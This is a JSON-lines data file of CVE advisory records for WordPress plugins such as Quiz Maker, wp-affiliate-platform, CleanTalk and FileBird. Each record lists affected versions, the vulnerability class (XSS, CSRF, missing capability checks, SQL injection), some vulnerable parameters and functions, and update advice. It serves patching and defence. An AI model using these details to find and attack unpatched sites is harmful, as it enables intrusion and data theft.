{"CVE_ID":"CVE-2024-24881","slug":"wp-sms","versionEndExcluding":"6.5.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs WP SMS \u2013 Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc allows Reflected XSS.This issue affects WP SMS \u2013 Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc: from n\/a through 6.5.2.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-sms\\\/wordpress-wp-sms-plugin-6-5-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-sms\\\/wordpress-wp-sms-plugin-6-5-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11466","slug":"dp-intro-tours","versionImpact":"6.5.2","versionEndExcluding":"6.5.3","description":"The Intro Tour Tutorial DeepPresentation plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 6.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 6.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dp-intro-tours\\\/tags\\\/6.5.2\\\/admin\\\/class-dp-intro-tours-admin-settings.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dp-intro-tours\\\/tags\\\/6.5.2\\\/admin\\\/class-dp-intro-tours-admin-settings.php#L125\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198780%40dp-intro-tours&new=3198780%40dp-intro-tours&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198780%40dp-intro-tours&new=3198780%40dp-intro-tours&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fe082a7-3d36-48b4-b81f-1e65e5ea430d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fe082a7-3d36-48b4-b81f-1e65e5ea430d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6883","slug":"easy-facebook-likebox","versionImpact":"6.5.2","versionEndExcluding":"6.5.3","description":"The Easy Social Feed plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on multiple AJAX functions in all versions up to, and including, 6.5.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform unauthorized actions, such as modifying the plugin's Facebook and Instagram access tokens and updating group IDs.","recommendation":"Update to version 6.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3deee9b5-2e36-447d-a492-e22e3dc6a5ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3deee9b5-2e36-447d-a492-e22e3dc6a5ab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012165\\\/easy-facebook-likebox\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012165\\\/easy-facebook-likebox\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6109","slug":"yop-poll","versionImpact":"6.5.26","versionEndExcluding":"6.5.27","description":"The YOP Poll plugin for WordPress is vulnerable to a race condition in all versions up to, and including, 6.5.26. This is due to improper restrictions on the add() function. This makes it possible for unauthenticated attackers to place multiple votes on a single poll even when the poll is set to one vote per person.","recommendation":"Update to version 6.5.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/360b1927-a863-46be-ad11-3f6251c75a3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/360b1927-a863-46be-ad11-3f6251c75a3c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2959124\\\/yop-poll\\\/trunk\\\/admin\\\/models\\\/votes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2959124\\\/yop-poll\\\/trunk\\\/admin\\\/models\\\/votes.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1079","slug":"quiz-maker","versionImpact":"6.5.2.4","versionEndExcluding":"6.5.2.5","description":"The Quiz Maker plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ays_show_results() function in all versions up to, and including, 6.5.2.4. This makes it possible for unauthenticated attackers to fetch arbitrary quiz results which can contain PII.","recommendation":"Update to version 6.5.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602df370-cd5b-46dc-a653-6522aef0c62f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602df370-cd5b-46dc-a653-6522aef0c62f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032035\\\/quiz-maker\\\/tags\\\/6.5.2.5\\\/admin\\\/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032035\\\/quiz-maker\\\/tags\\\/6.5.2.5\\\/admin\\\/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1078","slug":"quiz-maker","versionImpact":"6.5.2.4","versionEndExcluding":"6.5.2.5","description":"The Quiz Maker plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ays_quick_start() and add_question_rows() functions in all versions up to, and including, 6.5.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary quizzes.","recommendation":"Update to version 6.5.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ba2b270-5f02-4cd8-8a22-1723c3873d67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ba2b270-5f02-4cd8-8a22-1723c3873d67?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032035\\\/quiz-maker\\\/tags\\\/6.5.2.5\\\/admin\\\/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032035\\\/quiz-maker\\\/tags\\\/6.5.2.5\\\/admin\\\/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5282","slug":"wp-travel-engine","versionImpact":"6.5.1","versionEndExcluding":"6.5.2","description":"The WP Travel Engine \u2013 Tour Booking Plugin \u2013 Tour Operator Software plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the delete_package() function in all versions up to, and including, 6.5.1. This makes it possible for unauthenticated attackers to delete arbitrary posts.","recommendation":"Update to version 6.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305447\\\/wp-travel-engine\\\/tags\\\/6.5.2\\\/includes\\\/classes\\\/Core\\\/Controllers\\\/RestAPI\\\/V2\\\/Trip.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305447\\\/wp-travel-engine\\\/tags\\\/6.5.2\\\/includes\\\/classes\\\/Core\\\/Controllers\\\/RestAPI\\\/V2\\\/Trip.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebc8d724-3936-42d8-8850-bc330c5221dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebc8d724-3936-42d8-8850-bc330c5221dc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5285","slug":"wp-affiliate-platform","versionImpact":"6.5.1","versionEndExcluding":"6.5.2","description":"The wp-affiliate-platform WordPress plugin before 6.5.2 does not have CSRF check in place when deleting affiliates, which could allow attackers to make a logged in user change delete them via a CSRF attack","recommendation":"Update to version 6.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/792f3904-88bd-47d1-9049-afccdd74853a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/792f3904-88bd-47d1-9049-afccdd74853a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5287","slug":"wp-affiliate-platform","versionEndExcluding":"6.5.1","description":"The wp-affiliate-platform WordPress plugin before 6.5.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in user change them via a CSRF attack","recommendation":"Update to version 6.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4fd535c-a273-419d-9e2e-be1cbd822793\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4fd535c-a273-419d-9e2e-be1cbd822793\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5286","slug":"wp-affiliate-platform","versionEndExcluding":"6.5.1","description":"The wp-affiliate-platform WordPress plugin before 6.5.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 6.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0b3069c-59d3-41ea-9b48-f5a4cf9ca45f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0b3069c-59d3-41ea-9b48-f5a4cf9ca45f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5284","slug":"wp-affiliate-platform","versionEndExcluding":"6.5.1","description":"The wp-affiliate-platform WordPress plugin before 6.5.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"Update to version 6.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a601a267-e781-439f-9c76-b4c841e819e5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a601a267-e781-439f-9c76-b4c841e819e5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5283","slug":"wp-affiliate-platform","versionEndExcluding":"6.5.1","description":"The wp-affiliate-platform WordPress plugin before 6.5.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 6.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3e1adcd3-7c46-45e8-9e2b-2ede0d79c943\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3e1adcd3-7c46-45e8-9e2b-2ede0d79c943\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5282","slug":"wp-affiliate-platform","versionEndExcluding":"6.5.1","description":"The wp-affiliate-platform WordPress plugin before 6.5.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 6.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf3fb97e-12fa-4b37-b28b-1771ddb5ceb1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf3fb97e-12fa-4b37-b28b-1771ddb5ceb1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5281","slug":"wp-affiliate-platform","versionEndExcluding":"6.5.1","description":"The wp-affiliate-platform WordPress plugin before 6.5.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 6.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c0bdb0f-a06a-47a8-9198-a2bf2678b8f1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c0bdb0f-a06a-47a8-9198-a2bf2678b8f1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5280","slug":"wp-affiliate-platform","versionImpact":"6.5.0","versionEndExcluding":"6.5.1","description":"The wp-affiliate-platform WordPress plugin before 6.5.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make non-logged in users execute an XSS payload via a CSRF attack","recommendation":"Update to version 6.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bbc214ba-4e97-4b3a-a21b-2931a9e36973\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bbc214ba-4e97-4b3a-a21b-2931a9e36973\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-22027","slug":"quiz-maker","versionEndExcluding":"6.5.0.6","description":"Improper input validation vulnerability in WordPress Quiz Maker Plugin prior to 6.5.0.6 allows a remote authenticated attacker to perform a Denial of Service (DoS) attack against external services.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-maker\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-maker\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN37326856\\\/\",\"name\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN37326856\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1669","slug":"wp-seopress","versionEndExcluding":"6.5.0.3","description":"The SEOPress WordPress plugin before 6.5.0.3 unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fb8791f5-2879-431e-9afc-06d5839e4b9d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fb8791f5-2879-431e-9afc-06d5839e4b9d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4520","slug":"uncanny-automator","versionImpact":"6.4.0.2","versionEndExcluding":"6.5.0","description":"The Uncanny Automator plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on multiple AJAX functions in versions up to, and including, 6.4.0.2. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update plugin settings.","recommendation":"Update to version 6.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uncanny-automator\\\/tags\\\/6.4.0.2\\\/src\\\/integrations\\\/keap\\\/helpers\\\/keap-helpers.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uncanny-automator\\\/tags\\\/6.4.0.2\\\/src\\\/integrations\\\/keap\\\/helpers\\\/keap-helpers.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db5b5fa1-67b5-4103-93b0-682200199a71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db5b5fa1-67b5-4103-93b0-682200199a71?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9169","slug":"litespeed-cache","versionImpact":"6.4.1","versionEndExcluding":"6.5","description":"The LiteSpeed Cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin debug settings in all versions up to, and including, 6.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/051a987a-944a-4898-872b-0456f0f59b27?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/051a987a-944a-4898-872b-0456f0f59b27?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.litespeedtech.com\\\/products\\\/cache-plugins\\\/wordpress-acceleration\",\"name\":\"https:\\\/\\\/www.litespeedtech.com\\\/products\\\/cache-plugins\\\/wordpress-acceleration\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4939","slug":"weaverx-theme-support","versionImpact":"6.4","versionEndExcluding":"6.5","description":"The Weaver Xtreme Theme Support plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's div shortcode in all versions up to, and including, 6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc121ed0-4cb3-4ba4-b693-413b1c25e4ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc121ed0-4cb3-4ba4-b693-413b1c25e4ca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3095286%40weaverx-theme-support%2Ftrunk&old=3017943%40weaverx-theme-support%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3095286%40weaverx-theme-support%2Ftrunk&old=3017943%40weaverx-theme-support%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4656","slug":"wp-stats-manager","versionEndExcluding":"6.5","description":"The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 6.5 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05976ed8-5a26-4eae-adb2-0ea3b2722391\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05976ed8-5a26-4eae-adb2-0ea3b2722391\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10781","slug":"cleantalk-spam-protect","versionImpact":"6.44","versionEndExcluding":"6.45","description":"The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an missing empty value check on the 'api_key' value in the 'perform' function in all versions up to, and including, 6.44. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.","recommendation":"Update to version 6.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cleantalk-spam-protect\\\/tags\\\/6.44\\\/lib\\\/Cleantalk\\\/ApbctWP\\\/RemoteCalls.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cleantalk-spam-protect\\\/tags\\\/6.44\\\/lib\\\/Cleantalk\\\/ApbctWP\\\/RemoteCalls.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cleantalk-spam-protect\\\/tags\\\/6.44\\\/lib\\\/Cleantalk\\\/ApbctWP\\\/RemoteCalls.php#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cleantalk-spam-protect\\\/tags\\\/6.44\\\/lib\\\/Cleantalk\\\/ApbctWP\\\/RemoteCalls.php#L96\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188546\\\/cleantalk-spam-protect#file653\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188546\\\/cleantalk-spam-protect#file653\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79ae062c-b084-4045-9407-2d94919993af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79ae062c-b084-4045-9407-2d94919993af?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10542","slug":"cleantalk-spam-protect","versionImpact":"6.43.2","versionEndExcluding":"6.44","description":"The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS spoofing on the checkWithoutToken function in all versions up to, and including, 6.43.2. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.","recommendation":"Update to version 6.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cleantalk-spam-protect\\\/tags\\\/6.43.2\\\/lib\\\/Cleantalk\\\/ApbctWP\\\/RemoteCalls.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cleantalk-spam-protect\\\/tags\\\/6.43.2\\\/lib\\\/Cleantalk\\\/ApbctWP\\\/RemoteCalls.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179819\\\/cleantalk-spam-protect#file631\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179819\\\/cleantalk-spam-protect#file631\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7eb5fad-bb62-4f0b-ad52-b16c3e442b62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7eb5fad-bb62-4f0b-ad52-b16c3e442b62?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6166","slug":"quiz-maker","versionImpact":"6.4.9.4","versionEndExcluding":"6.4.9.5","description":"The Quiz Maker WordPress plugin before 6.4.9.5 does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting","recommendation":"Update to version 6.4.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e6155d9b-f6bb-4607-ad64-1976a8afe907\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e6155d9b-f6bb-4607-ad64-1976a8afe907\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6155","slug":"quiz-maker","versionImpact":"6.4.9.4","versionEndExcluding":"6.4.9.5","description":"The Quiz Maker WordPress plugin before 6.4.9.5 does not adequately authorize the `ays_quiz_author_user_search` AJAX action, allowing an unauthenticated attacker to perform a search for users of the system, ultimately leaking user email addresses.","recommendation":"Update to version 6.4.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c62be802-e91a-4bcf-990d-8fd8ef7c9a28\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c62be802-e91a-4bcf-990d-8fd8ef7c9a28\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6986","slug":"filebird","versionImpact":"6.4.8","versionEndExcluding":"6.4.9","description":"The FileBird \u2013 WordPress Media Library Folders & File Manager plugin for WordPress is vulnerable to SQL Injection via the 'search' parameter in all versions up to, and including, 6.4.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Author-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 6.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filebird\\\/trunk\\\/includes\\\/Controller\\\/FolderController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filebird\\\/trunk\\\/includes\\\/Controller\\\/FolderController.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3338922%40filebird&new=3338922%40filebird&sfp_email=&sfph_mail=#file11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3338922%40filebird&new=3338922%40filebird&sfp_email=&sfph_mail=#file11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce70da8e-7273-4eca-b187-2db7c36f1a50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce70da8e-7273-4eca-b187-2db7c36f1a50?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5889","slug":"events-manager","versionImpact":"6.4.8","versionEndExcluding":"6.4.9","description":"The Events Manager \u2013 Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018country\u2019 parameter in all versions up to, and including, 6.4.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 6.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73cbb65e-b4e3-4374-9916-9a3d1be5a014?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73cbb65e-b4e3-4374-9916-9a3d1be5a014?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106809\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106809\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10356","slug":"element-ready-lite","versionImpact":"6.4.8","versionEndExcluding":"6.4.9","description":"The ElementsReady Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.8 in inc\/Widgets\/accordion\/output\/content.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 6.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204333\\\/element-ready-lite\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204333\\\/element-ready-lite\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0a48c91-7e2c-4708-b5af-dfbcfea08f83?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0a48c91-7e2c-4708-b5af-dfbcfea08f83?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
